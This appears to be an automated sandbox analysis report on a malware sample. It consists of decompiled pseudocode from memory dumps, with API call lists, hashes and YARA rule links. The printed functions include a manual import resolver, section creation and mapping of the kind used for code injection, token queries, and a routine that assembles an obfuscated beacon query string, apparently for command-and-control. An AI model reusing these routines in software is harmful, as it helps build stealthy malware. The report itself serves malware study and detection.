					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E100015A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E10001C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E10001CA4(E100016EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E10001D7C(_t45,  &_v48) != 0) {
					 *0x100041b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x100041b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E10001C8F(_t50 + _t15);
				 *0x100041b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E1000136A(_t44);
					goto L11;
				}
			}

0x100017b3
0x100017bc
0x100017c0
0x100018c8
0x100018ce
0x00000000
0x00000000
0x00000000
0x100017c6
0x100017c6
0x100017cb
0x100017d1
0x100017e0
0x100017e1
0x100017e4
0x100017e7
0x100017f0
0x100017f4
0x100017fa
0x100017fe
0x10001805
0x00000000
0x00000000
0x1000180b
0x10001812
0x10001816
0x100018b9
0x100018b9
0x100018c0
0x100018c2
0x100018c2
0x00000000
0x100018c0
0x1000181f
0x10001872
0x10001872
0x10001883
0x10001887
0x100018b5
0x10001889
0x1000188c
0x10001894
0x10001898
0x100018a0
0x100018a0
0x100018a7
0x100018a7
0x00000000
0x10001887
0x1000182d
0x1000186c
0x00000000
0x1000186c
0x1000182f
0x10001833
0x1000183c
0x1000183e
0x10001842
0x10001864
0x10001864
0x00000000
0x10001864
0x10001844
0x10001849
0x10001850
0x10001855
0x00000000
0x10001857
0x1000185a
0x1000185d
0x00000000
0x1000185d

APIs

Part of subcall function 1000146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,100017B8,74E063F0,00000000), ref: 1000147B
Part of subcall function 1000146C: GetVersion.KERNEL32 ref: 1000148A
Part of subcall function 1000146C: GetCurrentProcessId.KERNEL32 ref: 10001499
Part of subcall function 1000146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100014B2

GetSystemTime.KERNEL32(?,74E063F0,00000000), ref: 100017CB
SwitchToThread.KERNEL32 ref: 100017D1

Part of subcall function 100015A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 100015F9
Part of subcall function 100015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,100017EC), ref: 1000168B
Part of subcall function 100015A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 100016A6

Sleep.KERNELBASE(00000000,00000000), ref: 100017F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 1000183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 1000185A
WaitForSingleObject.KERNEL32(00000000,000000FF,100016EC,?,00000000), ref: 1000188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 100018A0
CloseHandle.KERNEL32(00000000), ref: 100018A7
GetLastError.KERNEL32(100016EC,?,00000000), ref: 100018AF
GetLastError.KERNEL32 ref: 100018C2

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 0aa58aa6d42cb4d22d23c436fe1160939981fc51a77b7536e6a86e18351e194f
Instruction ID: 7cd3c566562f9a2fb2f569ae31459f2ac3cb863b4347ce568516a042169d6725
Opcode Fuzzy Hash: 0aa58aa6d42cb4d22d23c436fe1160939981fc51a77b7536e6a86e18351e194f
Instruction Fuzzy Hash: 8831A1758057629BF311DF658C889DF77ECEF856D0B118A2AF954C2198EB30DA408BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00F93CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00F93CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00F95C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00F92A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00f93cae
0x00f93caf
0x00f93cb0
0x00f93cb1
0x00f93cb2
0x00f93cb6
0x00f93cbd
0x00f93ccc
0x00f93ccf
0x00f93cd2
0x00f93cd9
0x00f93cdc
0x00f93cdf
0x00f93ce2
0x00f93ce5
0x00f93cf0
0x00f93cf2
0x00f93cfb
0x00f93d03
0x00f93d05
0x00f93d17
0x00f93d21
0x00f93d25
0x00f93d34
0x00f93d38
0x00f93d41
0x00f93d49
0x00f93d49
0x00f93d4b
0x00f93d4b
0x00f93d53
0x00f93d59
0x00f93d5d
0x00f93d5d
0x00f93d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00F93CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00F93CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00F93D17

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00F93D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00F93D41
NtClose.NTDLL(00000000), ref: 00F93D53
NtClose.NTDLL(00000000), ref: 00F93D5D

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: adfa304aa20d5a95f9b9045487120bc3f18ea9f566162abb4559c08dc39fe324
Instruction ID: 574431e5527ff46d97e5074677745ae8cda8982c10d01cd2af61ae3e43780a32
Opcode Fuzzy Hash: adfa304aa20d5a95f9b9045487120bc3f18ea9f566162abb4559c08dc39fe324
Instruction Fuzzy Hash: 7B21E57290021DBBEF119FA5CC459DEBFBDFF48750F104026F905E6160D7B59A44ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 100018D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E100018D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x100018da
0x100018e1
0x100018e2
0x100018e3
0x100018e4
0x100018e5
0x100018f6
0x100018fa
0x1000190e
0x10001911
0x10001914
0x1000191b
0x1000191e
0x10001925
0x10001928
0x1000192b
0x1000192e
0x10001933
0x1000196e
0x10001935
0x10001938
0x1000193e
0x10001943
0x10001947
0x10001965
0x10001949
0x10001950
0x1000195e
0x1000195e
0x10001947
0x10001976

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 1000192E

Part of subcall function 10001B89: NtMapViewOfSection.NTDLL(00000000,000000FF,10001943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001943,?), ref: 10001BB6

memset.NTDLL ref: 10001950

Strings

@, xrefs: 1000191E

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction ID: 88968e9661e63988d5d647865b6f2f1c375d5b01606aef7ca8e18f58fbe53b39
Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction Fuzzy Hash: E521EDB5D00209AFDB11DFA9C8849DEFBF9EF48394F108469E515F7210D731AA458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x100041cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x10001f31
0x10001f3a
0x10001f3f
0x10001f45
0x10001f4e
0x10001f54
0x10001f56
0x10001f59
0x10001f5e
0x10001f65
0x10001f65
0x10001f69
0x10001f71
0x10001f74
0x00000000
0x00000000
0x10001f7a
0x10001f84
0x10001f86
0x10001f89
0x10001f8c
0x10001f90
0x10001f98
0x10001f9a
0x10001f9d
0x10002005
0x10002005
0x10002009
0x00000000
0x00000000
0x10001fa2
0x10001fa8
0x10001faa
0x10001fbd
0x10001fc0
0x10001fc0
0x10001fc0
0x10001fc4
0x10001fac
0x10001fac
0x10001fb4
0x10001fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001fb6
0x10001fa4
0x10001fa4
0x10001fb8
0x10001fb8
0x10001fb8
0x10001fc7
0x10001fca
0x10001fcc
0x10001fd3
0x10001fce
0x10001fce
0x10001fce
0x10001fdb
0x10001fe1
0x10001fe3
0x10002013
0x10001fe5
0x10001fe5
0x10001fe8
0x10001fea
0x10001ff2
0x10001ff2
0x10001ff7
0x10001ff9
0x10002000
0x10002002
0x10002002
0x10002002
0x00000000
0x10002002
0x00000000
0x10001fe3
0x10001f92
0x10001f94
0x10001f96
0x00000000
0x00000000
0x10001f96
0x10002016
0x10002016
0x1000201d
0x10002022
0x00000000
0x00000000
0x10002028
0x10002033
0x00000000
0x10002033
0x1000202a
0x1000202a
0x10002030
0x00000000
0x10002030
0x10001f5e
0x10002034
0x10002039

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001F69
GetProcAddress.KERNEL32(?,00000000), ref: 10001FDB

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 8a1e24b1730c93038a55839a6fd0af963c9c775c1d27b9a4ad58f69dd9bbcb08
Instruction ID: facda564c99ca29c41b9bf4a0afbb846e542845cee9f1e4b1a4199668aefdd72
Opcode Fuzzy Hash: 8a1e24b1730c93038a55839a6fd0af963c9c775c1d27b9a4ad58f69dd9bbcb08
Instruction Fuzzy Hash: 2D3126B1A0021ADFEB54CF59C880AAEB7F8FF44384F21416AD805E7249E770DA40DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10001B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001b9b
0x10001ba1
0x10001baf
0x10001bb6
0x10001bbb
0x10001bc1
0x00000000
0x10001bc2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,10001943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001943,?), ref: 10001BB6

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 8253b62b5d3e496939fbf18d0a28b58aebeb174cc4637ac6340b5877441cb59f
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: FDF01CB690020CFFEB119FA5CC89C9FBBFDEB44294B104939B552E1095E730AE089B60

Uniqueness

Uniqueness Score: -1.00%

Function 00F96DB7, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F96DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xf9a018; // 0xa6c26295
				asm("bswap eax");
				_t65 =  *0xf9a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xf9a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xf9a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0xf9a2d0; // 0x310d5a8
				_t3 = _t68 + 0xf9b622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0xf9a02c,  *0xf9a004, _t63);
				_t71 = E00F9271A();
				_t72 =  *0xf9a2d0; // 0x310d5a8
				_t4 = _t72 + 0xf9b662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0xf9a2d0; // 0x310d5a8
					_t8 = _t140 + 0xf9b66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E00F92956(_t145);
				_t77 =  *0xf9a2d0; // 0x310d5a8
				_t10 = _t77 + 0xf9b38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0xf9a2d0; // 0x310d5a8
				_t12 = _t81 + 0xf9b7b4; // 0x40a8d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0xf9b33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0xf9a318; // 0x40a95e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0xf9a2d0; // 0x310d5a8
					_t18 = _t136 + 0xf9b8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0xf9a328; // 0x40a95b0
				if(_t86 != 0) {
					_t133 =  *0xf9a2d0; // 0x310d5a8
					_t20 = _t133 + 0xf9b685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0xf9a37c; // 0x40a9630
				_t88 = E00F95741(0xf9a00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0xf9a290, _t168, _t144); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xf9a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xf9a290, _t168, _v12);
						goto L28;
					}
					E00F91A51(GetTickCount());
					_t95 =  *0xf9a37c; // 0x40a9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xf9a37c; // 0x40a9630
					__imp__(_t99 + 0x40);
					_t101 =  *0xf9a37c; // 0x40a9630
					_t102 = E00F95AE3(1, _t157, _t144,  *_t101); // executed
					_t164 = _t102;
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						RtlFreeHeap( *0xf9a290, _t168, _a8); // executed
						goto L27;
					}
					StrTrimA(_t164, 0xf992cc);
					_push(_t164);
					_t107 = E00F92829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						RtlFreeHeap( *0xf9a290, _t168, _t164); // executed
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E00F933FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E00F92813();
						L24:
						RtlFreeHeap( *0xf9a290, 0, _v8); // executed
						_t168 = 0;
						goto L25;
					}
					_t116 = E00F95C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_t123 = E00F91671(_t172, _a4, _a12, _a16); // executed
						_a20 = _t123;
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E00F92A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E00F96459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00F92A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00f96db7
0x00f96db7
0x00f96db7
0x00f96dc0
0x00f96dc5
0x00f96dcc
0x00f96dce
0x00f96dce
0x00f96ddb
0x00f96de6
0x00f96de9
0x00f96df4
0x00f96df7
0x00f96dfc
0x00f96dff
0x00f96e04
0x00f96e07
0x00f96e13
0x00f96e20
0x00f96e22
0x00f96e28
0x00f96e2d
0x00f96e38
0x00f96e3a
0x00f96e3d
0x00f96e43
0x00f96e45
0x00f96e4d
0x00f96e58
0x00f96e5a
0x00f96e5d
0x00f96e5d
0x00f96e5f
0x00f96e66
0x00f96e6b
0x00f96e78
0x00f96e7a
0x00f96e7f
0x00f96e87
0x00f96e8a
0x00f96e90
0x00f96e9b
0x00f96e9d
0x00f96ea2
0x00f96ea7
0x00f96eaa
0x00f96eaf
0x00f96eba
0x00f96ebc
0x00f96ebf
0x00f96ebf
0x00f96ec1
0x00f96ec8
0x00f96ecb
0x00f96ed0
0x00f96eda
0x00f96edc
0x00f96edc
0x00f96edf
0x00f96eed
0x00f96ef2
0x00f96ef6
0x00f96ef9
0x00f970c5
0x00f970cd
0x00f970da
0x00f96eff
0x00f96f0b
0x00f96f13
0x00f96f16
0x00f970b5
0x00f970bf
0x00000000
0x00f970bf
0x00f96f22
0x00f96f27
0x00f96f30
0x00f96f41
0x00f96f45
0x00f96f4e
0x00f96f54
0x00f96f5c
0x00f96f61
0x00f96f68
0x00f96f71
0x00f96f77
0x00f970a5
0x00f970af
0x00000000
0x00f970af
0x00f96f83
0x00f96f89
0x00f96f8a
0x00f96f91
0x00f96f94
0x00f97097
0x00f9709f
0x00000000
0x00f9709f
0x00f96f9d
0x00f96fa3
0x00f96fac
0x00f96fb5
0x00f96fbb
0x00f96fc2
0x00f96fc9
0x00f96fcc
0x00f970dd
0x00f9707f
0x00f9707f
0x00f97084
0x00f9708f
0x00f97095
0x00000000
0x00f97095
0x00f96fd6
0x00f96fdd
0x00f96fe0
0x00f96fe5
0x00f96ff0
0x00f96ff5
0x00f96ff8
0x00f96ffe
0x00f97004
0x00f9700a
0x00f9700d
0x00f97013
0x00f97016
0x00f9701b
0x00f9701f
0x00f9701f
0x00f9702b
0x00f97037
0x00f9703b
0x00f9703d
0x00f97042
0x00f97044
0x00f97049
0x00f9704e
0x00f9705b
0x00f97063
0x00f97066
0x00f97066
0x00f97042
0x00000000
0x00f9702d
0x00f97031
0x00f97068
0x00f9706b
0x00f97074
0x00000000
0x00000000
0x00000000
0x00000000
0x00f97074
0x00f97033
0x00000000
0x00f97033
0x00f9702b

APIs

GetTickCount.KERNEL32 ref: 00F96DCE
wsprintfA.USER32 ref: 00F96E1B
wsprintfA.USER32 ref: 00F96E38
wsprintfA.USER32 ref: 00F96E58
wsprintfA.USER32 ref: 00F96E76
wsprintfA.USER32 ref: 00F96E99
wsprintfA.USER32 ref: 00F96EBA
wsprintfA.USER32 ref: 00F96EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F96F0B
GetTickCount.KERNEL32 ref: 00F96F1C
RtlEnterCriticalSection.NTDLL(040A95F0), ref: 00F96F30
RtlLeaveCriticalSection.NTDLL(040A95F0), ref: 00F96F4E

Part of subcall function 00F95AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F95B0E
Part of subcall function 00F95AE3: lstrlen.KERNEL32(00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F95B16
Part of subcall function 00F95AE3: strcpy.NTDLL ref: 00F95B2D
Part of subcall function 00F95AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00F95B38
Part of subcall function 00F95AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F96301,?,00000000,00F96301,00000000,040A9630), ref: 00F95B55

StrTrimA.SHLWAPI(00000000,00F992CC,?,040A9630), ref: 00F96F83

Part of subcall function 00F92829: lstrlen.KERNEL32(040A887A,00000000,00000000,00000000,00F96328,00000000), ref: 00F92839
Part of subcall function 00F92829: lstrlen.KERNEL32(?), ref: 00F92841
Part of subcall function 00F92829: lstrcpy.KERNEL32(00000000,040A887A), ref: 00F92855
Part of subcall function 00F92829: lstrcat.KERNEL32(00000000,?), ref: 00F92860

lstrcpy.KERNEL32(00000000,?), ref: 00F96FA3
lstrcat.KERNEL32(00000000,?), ref: 00F96FB5
lstrcat.KERNEL32(00000000,00000000), ref: 00F96FBB

